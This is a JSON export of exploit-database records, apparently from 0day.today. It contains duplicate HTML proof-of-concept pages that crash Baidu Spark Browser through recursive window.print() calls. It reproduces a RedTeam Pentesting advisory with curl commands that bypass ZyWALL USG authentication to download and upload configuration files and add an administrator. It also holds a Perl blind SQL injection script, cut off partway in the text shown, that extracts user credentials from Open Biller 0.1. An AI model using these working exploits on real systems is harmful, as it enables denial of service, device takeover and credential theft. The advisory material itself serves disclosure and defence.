{"zdt": [{"lastseen": "2018-01-01T07:03:32", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2014-08-25T00:00:00", "published": "2014-08-25T00:00:00", "id": "1337DAY-ID-22545", "href": "https://0day.today/exploit/description/22545", "type": "zdt", "title": "Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS", "sourceData": "<!--\r\n\r\nBaidu Spark Browser v26.5.9999.3511 Remote Stack Overflow Vulnerability (DoS)\r\n\r\n\r\nVendor: Baidu, Inc.\r\nProduct web page: http://www.baidu.com\r\nAffected version: 26.5.9999.3511\r\n\r\nSummary: Spark Browser is a free Internet browser with very\r\nsharp UIs and cool utilities. It's based on the Chromium\r\ntechnology platform, giving it fast browsing capabilities.\r\n\r\nDesc: Spark Browser version 26.5.9999.3511 allows remote\r\nattackers to cause a denial of service (application crash)\r\nresulting in stack overflow via nested calls to the window.print\r\njavascript function.\r\n\r\n-----------------------------------------------------------------\r\n\r\n(153c.14f4): Stack overflow - code c00000fd (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=000000b0 ebx=003d0000 ecx=003d0000 edx=5000016b esi=00000000 edi=0000010c\r\neip=77e0decf esp=03d23000 ebp=03d230c4 iopl=0 nv up ei pl nz na po nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202\r\nntdll!memcpy+0xbb8f:\r\n77e0decf 56 push esi\r\n\r\n-----------------------------------------------------------------\r\n\r\nTested on: Microsoft Windows 7 Professional SP1 (EN)\r\nMicrosoft Windows 7 Ultimate SP1 (EN)\r\n\r\n\r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n@zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2014-5190\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5190.php\r\n\r\n\r\n28.06.2014\r\n\r\n-->\r\n\r\n\r\n<html>\r\n<title>Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC</title>\r\n<body bgcolor=\"#50708C\">\r\n<center>\r\n<p><font color=\"#e3e3e3\">Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS\r\nPoC</font></p>\r\n<button onClick=crash()>Execute!</button>\r\n</center>\r\n<script>\r\nfunction crash(){\r\nwindow.print();\r\ncrash();\r\n}\r\n</script>\r\n</body>\r\n</html>\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22545"}, {"lastseen": "2018-01-02T09:14:25", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2014-07-04T00:00:00", "published": "2014-07-04T00:00:00", "id": "1337DAY-ID-22402", "href": "https://0day.today/exploit/description/22402", "type": "zdt", "title": "Baidu Spark Browser v26.5.9999.3511 - Remote Stack Overflow Vulnerability (DoS)", "sourceData": "<!--\r\n \r\nBaidu Spark Browser v26.5.9999.3511 Remote Stack Overflow Vulnerability (DoS)\r\n \r\n \r\nVendor: Baidu, Inc.\r\nProduct web page: http://www.baidu.com\r\nAffected version: 26.5.9999.3511\r\n \r\nSummary: Spark Browser is a free Internet browser with very\r\nsharp UIs and cool utilities. It's based on the Chromium\r\ntechnology platform, giving it fast browsing capabilities.\r\n \r\nDesc: Spark Browser version 26.5.9999.3511 allows remote\r\nattackers to cause a denial of service (application crash)\r\nresulting in stack overflow via nested calls to the window.print\r\njavascript function.\r\n \r\n-----------------------------------------------------------------\r\n \r\n(153c.14f4): Stack overflow - code c00000fd (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=000000b0 ebx=003d0000 ecx=003d0000 edx=5000016b esi=00000000 edi=0000010c\r\neip=77e0decf esp=03d23000 ebp=03d230c4 iopl=0 nv up ei pl nz na po nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202\r\nntdll!memcpy+0xbb8f:\r\n77e0decf 56 push esi\r\n \r\n-----------------------------------------------------------------\r\n \r\nTested on: Microsoft Windows 7 Professional SP1 (EN)\r\n Microsoft Windows 7 Ultimate SP1 (EN)\r\n \r\n \r\nVulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n \r\n \r\nAdvisory ID: ZSL-2014-5190\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5190.php\r\n \r\n \r\n28.06.2014\r\n \r\n-->\r\n \r\n \r\n<html>\r\n<title>Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC</title>\r\n<body bgcolor=\"#50708C\">\r\n<center>\r\n<p><font color=\"#e3e3e3\">Baidu Spark Browser v26.5.9999.3511 Remote Stack Overflow DoS PoC</font></p>\r\n<button onClick=crash()>Execute!</button>\r\n</center>\r\n<script>\r\nfunction crash(){\r\n window.print();\r\n crash();\r\n}\r\n</script>\r\n</body>\r\n</html>\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/22402"}, {"lastseen": "2018-03-10T02:02:44", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category remote exploits", "modified": "2011-05-04T00:00:00", "published": "2011-05-04T00:00:00", "id": "1337DAY-ID-16040", "href": "https://0day.today/exploit/description/16040", "type": "zdt", "title": "ZyWALL USG Appliance Multiple Vulnerabilities", "sourceData": "Advisory: Authentication Bypass in Configuration Import and Export of\r\n ZyXEL ZyWALL USG Appliances\r\n \r\nUnauthenticated users with access to the management web interface of\r\ncertain ZyXEL ZyWALL USG appliances can download and upload\r\nconfiguration files, that are applied automatically.\r\n \r\n \r\nDetails\r\n=======\r\n \r\nProduct: ZyXEL USG (Unified Security Gateway) appliances\r\n ZyWALL USG-20\r\n ZyWALL USG-20W\r\n ZyWALL USG-50\r\n ZyWALL USG-100\r\n ZyWALL USG-200\r\n ZyWALL USG-300\r\n ZyWALL USG-1000\r\n ZyWALL USG-1050\r\n ZyWALL USG-2000\r\n Possibly other ZLD-based products\r\nAffected Versions: Firmware Releases before April 25, 2011\r\nFixed Versions: Firmware Releases from or after April 25, 2011\r\nVulnerability Type: Authentication Bypass\r\nSecurity Risk: high\r\nVendor URL: http://www.zyxel.com/\r\nVendor Status: fixed version released\r\nAdvisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2011-003\r\nAdvisory Status: published\r\nCVE: GENERIC-MAP-NOMATCH\r\nCVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH\r\n \r\n \r\nIntroduction\r\n============\r\n \r\n``The ZyWALL USG (Unified Security Gateway) Series is the \"third\r\ngeneration\" ZyWALL featuring an all-new platform. It provides greater\r\nperformance protection, as well as a deep packet inspection security\r\nsolution for small businesses to enterprises alike. It embodies a\r\nStateful Packet Inspection (SPI) firewall, Anti-Virus, Intrusion\r\nDetection and Prevention (IDP), Content Filtering, Anti-Spam, and VPN\r\n(IPSec/SSL/L2TP) in one box. This multilayered security safeguards your\r\norganization's customer and company records, intellectual property, and\r\ncritical resources from external and internal threats.''\r\n \r\n(From the vendor's homepage)\r\n \r\n \r\nMore Details\r\n============\r\n \r\nDuring a penetration test, a ZyXEL ZyWALL USG appliance was found and\r\ntested for security vulnerabilities. The following sections first\r\ndescribe, how the appliance's filesystem can be extracted from the\r\nencrypted firmware upgrade zip files. Afterwards it is shown, how\r\narbitrary configuration files can be up- and downloaded from the\r\nappliance. This way, a custom user account with a chosen password can\r\nbe added to the running appliance without the need of a reboot.\r\n \r\n \r\nDecrypting the ZyWALL Firmware Upgrade Files\r\n--------------------------------------------\r\n \r\nFirmware upgrade files for ZyXEL ZyWALL USG appliances consist of a\r\nregularly compressed zip file, which contains, among others, two\r\nencrypted zip files with the main firmware. For example, the current\r\nfirmware version 2.21(BQD.2) for the ZyWALL USG 20 (\"ZyWALL USG\r\n20_2.21(BDQ.2)C0.zip\") contains the following files:\r\n \r\n -rw-r--r-- 1 user user 43116374 Sep 30 2010 221BDQ2C0.bin\r\n -rw-r--r-- 1 user user 7354 Sep 30 2010 221BDQ2C0.conf\r\n -rw-r--r-- 1 user user 28395 Sep 30 2010 221BDQ2C0.db\r\n -rw-r--r-- 1 user user 703402 Oct 12 17:48 221BDQ2C0.pdf\r\n -rw-r--r-- 1 user user 3441664 Sep 30 2010 221BDQ2C0.ri\r\n -rw-r--r-- 1 user user 231 Sep 30 2010 firmware.xml\r\n \r\nThe files 221BDQ2C0.bin and 221BDQ2C0.db are encrypted zip files that\r\nrequire a password for decompression. Listing the contents is\r\npossible:\r\n \r\n $ unzip -l 221BDQ2C0.bin\r\n Archive: 221BDQ2C0.bin\r\n Length Date Time Name\r\n --------- ---------- ----- ----\r\n 40075264 2010-09-15 06:32 compress.img\r\n 0 2010-09-30 04:48 db/\r\n 0 2010-09-30 04:48 db/etc/\r\n 0 2010-09-30 04:48 db/etc/zyxel/\r\n 0 2010-09-30 04:48 db/etc/zyxel/ftp/\r\n 0 2010-09-30 04:48 db/etc/zyxel/ftp/conf/\r\n 20 2010-09-14 14:46 db/etc/zyxel/ftp/conf/htm-default.conf\r\n 7354 2010-09-14 14:46 db/etc/zyxel/ftp/conf/system-default.conf\r\n 0 2010-09-30 04:48 etc_writable/\r\n 0 2010-09-30 04:48 etc_writable/budget/\r\n 0 2010-09-14 15:08 etc_writable/budget/budget.conf\r\n 0 2010-09-15 06:28 etc_writable/firmware-upgraded\r\n 81 2010-09-14 15:09 etc_writable/myzyxel_info.conf\r\n 243 2010-09-14 15:03 etc_writable/tr069ta.conf\r\n 0 2010-09-30 04:48 etc_writable/zyxel/\r\n 0 2010-09-30 04:48 etc_writable/zyxel/conf/\r\n 996 2010-09-15 06:28 etc_writable/zyxel/conf/__eps_checking_default.xml\r\n 42697 2010-09-14 14:46 etc_writable/zyxel/conf/__system_default.xml\r\n 95 2010-09-30 04:48 filechecksum\r\n 1023 2010-09-30 04:48 filelist\r\n 336 2010-09-30 04:48 fwversion\r\n 50 2010-09-15 06:34 kernelchecksum\r\n 3441664 2010-09-30 04:48 kernelusg20.bin\r\n 0 2010-09-14 14:46 wtp_image/\r\n --------- -------\r\n 43569823 24 files\r\n \r\n $ unzip -l 221BDQ2C0.db\r\n Archive: 221BDQ2C0.db\r\n Length Date Time Name\r\n --------- ---------- ----- ----\r\n 0 2009-07-29 04:44 db_remove_lst\r\n 0 2010-09-15 06:28 etc/\r\n 0 2010-09-15 06:35 etc/idp/\r\n 39 2010-09-14 16:08 etc/idp/all.conf\r\n 25 2010-09-14 16:08 etc/idp/attributes.txt\r\n 639 2010-09-14 16:08 etc/idp/attributes_self.txt\r\n 277 2010-09-14 16:08 etc/idp/device.conf\r\n 39 2010-09-14 16:08 etc/idp/dmz.conf\r\n 39 2010-09-14 16:08 etc/idp/lan.conf\r\n 39 2010-09-14 16:08 etc/idp/none.conf\r\n 60581 2010-09-14 16:08 etc/idp/self.ref\r\n 5190 2010-09-14 16:08 etc/idp/self.rules\r\n 0 2010-09-14 16:08 etc/idp/update.ref\r\n 0 2010-09-14 16:08 etc/idp/update.rules\r\n 39 2010-09-14 16:08 etc/idp/wan.conf\r\n 445075 2010-09-14 16:08 etc/idp/zyxel.ref\r\n 327 2010-09-14 16:08 etc/idp/zyxel.rules\r\n 0 2010-09-14 16:05 etc/zyxel/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/.dha/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/.dha/dha_idp/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/cert/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/cert/trusted/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/conf/\r\n 20 2010-09-14 14:46 etc/zyxel/ftp/conf/htm-default.conf\r\n 7354 2010-09-14 14:46 etc/zyxel/ftp/conf/system-default.conf\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/dev/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/idp/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/packet_trace/\r\n 0 2010-09-15 06:35 etc/zyxel/ftp/script/\r\n 1256 2010-09-15 06:35 filelist\r\n --------- -------\r\n 520939 31 files\r\n \r\nDuring a penetration test it was discovered that the file\r\n\"221BDQ2C0.conf\" (from the unencrypted firmware zip file) has exactly\r\nthe same size as the file \"system-default.conf\" contained in each\r\nencrypted zip. This can be successfully used for a known-plaintext\r\nattack[1] against these files, afterwards the decrypted zip-files can be\r\nextracted. However, please note that this attack only allows decrypting\r\nthe encrypted zip files, the password used for encrypting the files in\r\nthe first place is not revealed.\r\n \r\nAmong others, the following programs implement this attack:\r\n \r\n * PkCrack by Peter Conrad [2]\r\n * Elcomsoft Advanced Archive Password Recovery [3]\r\n \r\nAfterwards, the file \"compress.img\" from \"221BDQ2C0.bin\" can be\r\ndecompressed (e.g. by using the program \"unsquashfs\"), revealing the\r\nfilesystem for the appliance.\r\n \r\n \r\nWeb-Interface Authentication Bypass\r\n-----------------------------------\r\n \r\nZyWALL USG appliances can be managed over a web-based administrative\r\ninterface offered by an Apache http server. The interface requires\r\nauthentication prior to any actions, only some static files can be\r\nrequested without authentication.\r\n \r\nA custom Apache module \"mod_auth_zyxel.so\" implements the\r\nauthentication, it is configured in etc/service_conf/httpd.conf in the\r\nfirmware (see above). Several Patterns are configured with the directive\r\n\"AuthZyxelSkipPattern\", all URLs matching one of these patterns can be\r\naccessed without authentication:\r\n \r\n AuthZyxelSkipPattern /images/ /weblogin.cgi /I18N.js /language\r\n \r\nThe administrative interface consists of several programs which are\r\ncalled as CGI scripts. For example, accessing the following URL after\r\nlogging in with an admin account delivers the current startup\r\nconfiguration file:\r\n \r\n https://192.168.0.1/cgi-bin/export-cgi?category=config&arg0=startup-config.conf\r\n \r\nThe Apache httpd in the standard configuration allows appending\r\narbitrary paths to CGI scripts. The server saves the extra path in the\r\nenvironment variable PATH_INFO and executes the CGI script (this can be\r\ndisabled by setting \"AcceptPathInfo\" to \"off\"[4]). Therefore, appending\r\nthe string \"/images/\" and requesting the following URL also executes the\r\n\"export-cgi\" script and outputs the current configuration file:\r\n \r\n https://192.168.0.1/cgi-bin/export-cgi/images/?category=config&arg0=startup-config.conf\r\n \r\nDuring the penetration test it was discovered that for this URL, no\r\nauthentication is necessary (because the string \"/images/\" is included\r\nin the path-part of the URL) and arbitrary configuration files can be\r\ndownloaded. The file \"startup-config.conf\" can contain sensitive data\r\nlike firewall rules and hashes of user passwords. Other interesting\r\nconfig-file names are \"lastgood.conf\" and \"systemdefault.conf\".\r\n \r\nThe administrative interface furthermore allows uploading of\r\nconfiguration files with the \"file_upload-cgi\" script. Applying the\r\nsame trick (appending \"/images/\"), arbitrary configuration files can be\r\nuploaded without any authentication. When the chosen config-file name\r\nis set to \"startup-config.conf\", the appliance furthermore applies all\r\nsettings directly after uploading. This can be used to add a second\r\nadministrative user with a self-chosen password and take over the\r\nappliance.\r\n \r\n \r\nProof of Concept\r\n================\r\n \r\nThe current startup-config.conf file from a ZyWALL USG appliance can be\r\ndownloaded by accessing the following URL, e.g. with the program cURL:\r\n \r\n $ curl --silent -o startup-config.conf \\\r\n \"https://192.168.0.1/cgi-bin/export-cgi/images/?category=config&arg0=startup-config.conf\"\r\n \r\nThis file can be re-uploaded (e.g. after adding another administrative\r\nuser) with the following command, the parameter \"ext-comp-1121\" may need\r\nto be adjusted:\r\n \r\n $ curl --silent -F ext-comp-1121=50 -F file_type=config -F nv=1 \\\r\n -F \"[email\u00a0protected];filename=startup-config.conf\" \\\r\n https://192.168.0.1/cgi-bin/file_upload-cgi/images/\r\n \r\n \r\nWorkaround\r\n==========\r\n \r\nIf possible, disable the web-based administrative interface or else\r\nensure that the interface is not exposed to attackers.\r\n \r\n \r\nFix\r\n===\r\n \r\nUpgrade to a firmware released on or after April 25, 2011.\r\n \r\n \r\nSecurity Risk\r\n=============\r\n \r\nAny attackers who are able to access the administrative interface of\r\nvulnerable ZyWALL USG appliances can read and write arbitrary configuration\r\nfiles, thus compromising the complete appliance. Therefore the risk is\r\nestimated as high.\r\n \r\n \r\nHistory\r\n=======\r\n \r\n2011-03-07 Vulnerability identified\r\n2011-04-06 Customer approved disclosure to vendor\r\n2011-04-07 Vendor notified\r\n2011-04-07 First reactions of vendor, issue is being investigated\r\n2011-04-08 Meeting with vendor\r\n2011-04-15 Vulnerability fixed by vendor\r\n2011-04-18 Test appliance and beta firmware supplied to\r\n RedTeam Pentesting, fix verified\r\n2011-04-25 Vendor released new firmwares with fix\r\n2011-04-29 Vendor confirms that other ZLD-based devices may also be\r\n affected\r\n2011-05-04 Advisory released\r\n \r\nRedTeam Pentesting likes to thank ZyXEL for the fast response and\r\nprofessional collaboration.\r\n \r\n \r\nReferences\r\n==========\r\n \r\n[1] ftp://utopia.hacktic.nl/pub/crypto/cracking/pkzip.ps.gz\r\n[2] http://www.unix-ag.uni-kl.de/~conrad/krypto/pkcrack.html\r\n[3] http://www.elcomsoft.com/archpr.html\r\n[4] http://httpd.apache.org/docs/2.0/mod/core.html#acceptpathinfo\r\n \r\n \r\nRedTeam Pentesting GmbH\r\n=======================\r\n \r\nRedTeam Pentesting offers individual penetration tests, short pentests,\r\nperformed by a team of specialised IT-security experts. Hereby, security\r\nweaknesses in company networks or products are uncovered and can be\r\nfixed immediately.\r\n \r\nAs there are only few experts in this field, RedTeam Pentesting wants to\r\nshare its knowledge and enhance the public knowledge with research in\r\nsecurity related areas. The results are made available as public\r\nsecurity advisories.\r\n \r\nMore information about RedTeam Pentesting can be found at\r\nhttp://www.redteam-pentesting.de.\r\n \r\n \r\n-- \r\nRedTeam Pentesting GmbH Tel.: +49 241 963-1300\r\nDennewartstr. 25-27 Fax : +49 241 963-1304\r\n52068 Aachen http://www.redteam-pentesting.de/\r\nGermany Registergericht: Aachen HRB 14004\r\nGesch\u00c3\u00a4ftsf\u00c3\u00bchrer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck\r\n \r\n \r\nAdvisory: Client Side Authorization ZyXEL ZyWALL USG Appliances Web\r\n Interface\r\n \r\nThe ZyXEL ZyWALL USG appliances perform parts of the authorization for\r\ntheir management web interface on the client side using JavaScript. By\r\nsetting the JavaScript variable \"isAdmin\" to \"true\", a user with limited\r\naccess gets full access to the web interface.\r\n \r\n \r\nDetails\r\n=======\r\n \r\nProduct: ZyXEL USG (Unified Security Gateway) appliances\r\n ZyWALL USG-20\r\n ZyWALL USG-20W\r\n ZyWALL USG-50\r\n ZyWALL USG-100\r\n ZyWALL USG-200\r\n ZyWALL USG-300\r\n ZyWALL USG-1000\r\n ZyWALL USG-1050\r\n ZyWALL USG-2000\r\n Possibly other ZLD-based products\r\nAffected Versions: Firmware Releases before April 25, 2011\r\nFixed Versions: Firmware Releases from or after April 25, 2011\r\nVulnerability Type: Client Side Authorization\r\nSecurity Risk: medium\r\nVendor URL: http://www.zyxel.com/\r\nVendor Status: fixed version released\r\nAdvisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2011-004\r\nAdvisory Status: published\r\nCVE: GENERIC-MAP-NOMATCH\r\nCVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH\r\n \r\n \r\nIntroduction\r\n============\r\n \r\n``The ZyWALL USG (Unified Security Gateway) Series is the \"third\r\ngeneration\" ZyWALL featuring an all-new platform. It provides greater\r\nperformance protection, as well as a deep packet inspection security\r\nsolution for small businesses to enterprises alike. It embodies a\r\nStateful Packet Inspection (SPI) firewall, Anti-Virus, Intrusion\r\nDetection and Prevention (IDP), Content Filtering, Anti-Spam, and VPN\r\n(IPSec/SSL/L2TP) in one box. This multilayered security safeguards your\r\norganization's customer and company records, intellectual property, and\r\ncritical resources from external and internal threats.''\r\n \r\n(From the vendor's homepage)\r\n \r\n \r\nMore Details\r\n============\r\n \r\nUsers with the role \"limited-admin\" are allowed to log into the\r\nweb-based administrative interface and configure some aspects of a\r\nZyWALL USG appliance. It is usually not possible to download the current\r\nconfiguration file, as this includes the password-hashes of all users.\r\nWhen the \"download\" button in the File Manager part of the web interface\r\nis pressed, a JavaScript dialogue window informs the user that this\r\noperation is not allowed. However, setting the JavaScript variable\r\n\"isAdmin\" to \"true\" (e.g. by using the JavaScript console of the\r\n\"Firebug\" extension for the Firefox web browser) disables this check and\r\nlets the user download the desired configuration file. It is also\r\npossible to directly open the URL that downloads the configuration file.\r\nThe appliances do not check the users' permissions on the server side.\r\n \r\n \r\nProof of Concept\r\n================\r\n \r\nAfter logging into the web interface, set the local JavaScript variable\r\n\"isAdmin\" to \"true\" and use the File Manager to download configuration\r\nfiles. Alternatively, the current configuration file (including the\r\npassword hashes) can also be downloaded directly by accessing the\r\nfollowing URL:\r\n \r\n https://192.168.0.1/cgi-bin/export-cgi?category=config&arg0=startup-config.conf\r\n \r\n \r\nWorkaround\r\n==========\r\n \r\nIf possible, disable the web-based administrative interface or ensure\r\notherwise that the interface is not exposed to attackers.\r\n \r\n \r\nFix\r\n===\r\n \r\nUpgrade to a firmware released on or after April 25, 2011.\r\n \r\n \r\nSecurity Risk\r\n=============\r\n \r\nThis vulnerability enables users of the role \"limited-admin\" to access\r\nconfiguration files with potentially sensitive information (like the\r\npassword hashes of all other users). The risk of this vulnerability is\r\nestimated as medium.\r\n \r\n \r\nHistory\r\n=======\r\n \r\n2011-03-07 Vulnerability identified\r\n2011-04-06 Customer approved disclosure to vendor\r\n2011-04-07 Vendor notified\r\n2011-04-08 Meeting with vendor\r\n2011-04-15 Vulnerability fixed by vendor\r\n2011-04-18 Test appliance and beta firmware supplied to\r\n RedTeam Pentesting, fix verified\r\n2011-04-25 Vendor released new firmwares with fix\r\n2011-04-29 Vendor confirms that other ZLD-based devices may also be\r\n affected\r\n2011-05-04 Advisory released\r\n \r\nRedTeam Pentesting likes to thank ZyXEL for the fast response and\r\nprofessional collaboration.\r\n\r\n\n\n# 0day.today [2018-03-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/16040"}, {"lastseen": "2018-04-14T01:51:57", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2009-06-10T00:00:00", "published": "2009-06-10T00:00:00", "id": "1337DAY-ID-5349", "href": "https://0day.today/exploit/description/5349", "type": "zdt", "title": "Open Biller 0.1 (username) Blind SQL Injection Exploit", "sourceData": "======================================================\r\nOpen Biller 0.1 (username) Blind SQL Injection Exploit\r\n======================================================\r\n\r\n\r\n#!/usr/bin/perl\r\n#***********************************************************************************************\r\n#***********************************************************************************************\r\n#***********************************************************************************************\r\n#\r\n#---------------------------------------------------------------------------------------------\r\n#| \t \t (Post Form login var 'username') BLIND SQLi exploit \t |\r\n#|-------------------------------------------------------------------------------------------|\r\n#| | Open Biller 0.1 |\t\t \t |\r\n#| CMS INFORMATION: \t ------------------------\t \t |\r\n#|\t\t\t\t\t\t\t\t\t\t |\r\n#|-->WEB: http://sourceforge.net/projects/geekbill/\t\t\t \t\t |\r\n#|-->DOWNLOAD: http://sourceforge.net/projects/geekbill/\t\t |\r\n#|-->DEMO: N/A\t\t\t\t\t\t\t\t\t\t |\r\n#|-->CATEGORY: CMS / Portal\t\t\t\t\t\t\t\t |\r\n#|-->DESCRIPTION: Open Biller aims to to be a the best open source billing |\r\n#|\t\tsystem on the planet.The system is written in PHP/MYSQL... |\r\n#|-->RELEASED: 2009-05-31\t\t\t\t\t\t\t\t |\r\n#|\t\t\t\t\t\t\t\t\t\t\t |\r\n#| CMS VULNERABILITY:\t\t\t\t\t\t\t\t\t |\r\n#|\t\t\t\t\t\t\t\t\t\t\t |\r\n#|-->TESTED ON: firefox 3\t\t\t\t\t\t |\r\n#|-->DORK: N/A\t\t\t\t\t\t\t\t\t |\r\n#|-->CATEGORY: BLIND SQLi exploit\t\t\t\t\t\t |\r\n#|-->AFFECT VERSION: CURRENT\t\t\t\t\t\t \t\t |\r\n#|-->Discovered Bug date: 2009-06-09\t\t\t\t\t\t\t |\r\n#|-->Reported Bug date: 2009-06-09\t\t\t\t\t\t\t |\r\n#|-->Fixed bug date: N/A\t\t\t\t\t\t\t\t |\r\n#|-->Info patch: N/A\t\t\t\t\t\t\t\t\t |\r\n#|-->Author: YEnH4ckEr\t\t\t\t\t\t\t\t\t |\r\n#|-->WEB/BLOG: N/A\t\t\t\t\t\t\t\t\t |\r\n#|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. |\r\n#|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)\t\t |\r\n#---------------------------------------------------------------------------------------------\r\n#\r\n#------------\r\n#CONDITIONS:\r\n#------------\r\n#\r\n#magic quotes=OFF\r\n#\r\n#---------------------------------------\r\n#PROOF OF CONCEPT (SQL INJECTION):\r\n#---------------------------------------\r\n#\r\n#POST http://[HOST]/[PATH]/index.php HTTP/1.1\r\n#Host: [HOST]\r\n#User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10\r\n#Referer: http://[HOST]/[PATH]/\r\n#\r\n#username=%27+or+1%3D0%23&pass=1111&submit=Login\r\n#\r\n#username=%27+or+1%3D0%23&pass=1111&submit=Login\r\n#\r\n#\r\nuse LWP::UserAgent;\r\nuse HTTP::Request;\r\n#Subroutines\r\nsub lw\r\n{\r\n\tmy $SO = $^O;\r\n\tmy $linux = \"\";\r\n\tif (index(lc($SO),\"win\")!=-1){\r\n\t\t$linux=\"0\";\r\n\t}else{\r\n\t\t$linux=\"1\";\r\n\t}\t\t\r\n\tif($linux){\r\n\t\tsystem(\"clear\");\r\n\t}\r\n\telse{\r\n\t\tsystem(\"cls\");\r\n\t\tsystem (\"title Open Biller 0.1 Blind SQL Injection Exploit\");\r\n\t\tsystem (\"color 04\");\r\n\t}\r\n}\r\nsub request {\r\n\tmy $userag = LWP::UserAgent->new;\r\n\t$userag -> agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');\r\n\t$request = HTTP::Request -> new(POST => $_[0]);\r\n\t$request->referer($_[0]);\r\n\t$request->content_type('application/x-www-form-urlencoded');\r\n\t$request->content($_[1]);\r\n\tmy $outcode= $userag->request($request)->as_string;\r\n\t#print $outcode; #--> Active this line for debugger mode\r\n\t#print $request->as_string; #--> Active this line for debugger mode\r\n\treturn $outcode;\r\n}\r\nsub error {\r\nprint \"\\t------------------------------------------------------------\\n\";\r\n\tprint \"\\tWeb isn't vulnerable!\\n\\n\";\r\n\tprint \"\\t--->Maybe:\\n\\n\";\r\n\tprint \"\\t\\t1.-Patched.\\n\";\r\n\tprint \"\\t\\t2.-Bad path or host.\\n\";\r\n\tprint \"\\t\\t5.-Magic quotes ON'.\\n\";\r\n\tprint \"\\t\\tEXPLOIT FAILED!\\n\";\r\n\tprint \"\\t------------------------------------------------------------\\n\";\r\n}\r\nsub testedblindsql {\r\n\tprint \"\\t-----------------------------------------------------------------\\n\";\r\n\tprint \"\\tWEB MAYBE BE VULNERABLE!\\n\\n\";\r\n\tprint \"\\tTested Blind SQL Injection.\\n\";\t\t\r\n\tprint \"\\tStarting exploit...\\n\"; \r\n\tprint \"\\t-----------------------------------------------------------------\\n\\n\";\r\n}\r\nsub helper {\r\n\tprint \"\\n\\t[!!!] Open Biller 0.1 Blind SQL Injection Exploit\\n\";\r\n\tprint \"\\t[!!!] USAGE MODE: [!!!]\\n\";\r\n\tprint \"\\t[!!!] perl $0 [HOST] [PATH]\\n\";\r\n\tprint \"\\t[!!!] [HOST]: Web.\\n\";\r\n\tprint \"\\t[!!!] [PATH]: Home Path.\\n\";\r\n\tprint \"\\t[!!!] Example: perl $0 'www.example.com' 'demo'\\n\";\r\n}\r\nsub brute_length{\r\n#Username length\r\n$exit=0;\r\n$i=0;\r\nwhile($exit==0){\r\n\tmy $blindsql=\"username='+OR+1=1+AND+(SELECT+length(username)+FROM+users+WHERE+ID=1)=\".$i++.\"#&pass=1111&submit=Login\"; #injected code\r\n\t$output=&request($_[0],$blindsql);\r\n\tif($output =~ (/Incorrect password, please try again./)){\r\n\t\t$exit=1;\r\n\t}else{\r\n\t\t$exit=0;\r\n\t}\r\n\t#This is the max length of username\r\n\tif($i>60){\r\n\t&error;\r\n\texit(1);\r\n\t}\r\n}\r\n#Save column length\r\n$length=$i-1;\r\nprint \"\\t<<<<<--------------------------------------------------------->>>>>\\n\";\r\nprint \"\\tLength catched!\\n\";\r\nprint \"\\tLength Username --> \".$length.\"\\n\";\r\nprint \"\\tWait several minutes...\\n\";\r\nprint \"\\t<<<<<--------------------------------------------------------->>>>>\\n\\n\";\r\nreturn $length;\r\n}\r\nsub exploiting {\r\n#Bruteforcing values\r\n$values=\"\";\r\n$k=1;\r\n\t$z=45;\r\n\twhile(($k<=$_[1]) && ($z<=126)){\r\n\t\tmy $blindsql=\"username='+OR+1=1+AND+ascii(substring((SELECT+\".$_[2].\"+FROM+users+WHERE+ID=1),\".$k.\",1))=\".$z.\"#&pass=1111&submit=Login\";\r\n\t\t$output=&request($_[0],$blindsql);\r\n\t\tif($output =~ (/Incorrect password, please try again./))\r\n\t\t{\r\n\t\t\t$values=$values.chr($z);\r\n\t\t\t$k++;\r\n\t\t\t$z=45;\r\n\t\t}\r\n#new char\r\n\t$z++; \r\n\t}\r\nreturn $values;\r\n}\r\n#Main\r\n&lw;\r\nprint \"\\t#######################################################\\n\\n\";\r\nprint \"\\t#######################################################\\n\\n\";\r\nprint \"\\t## Open Biller 0.1 Blind SQL Injection Exploit 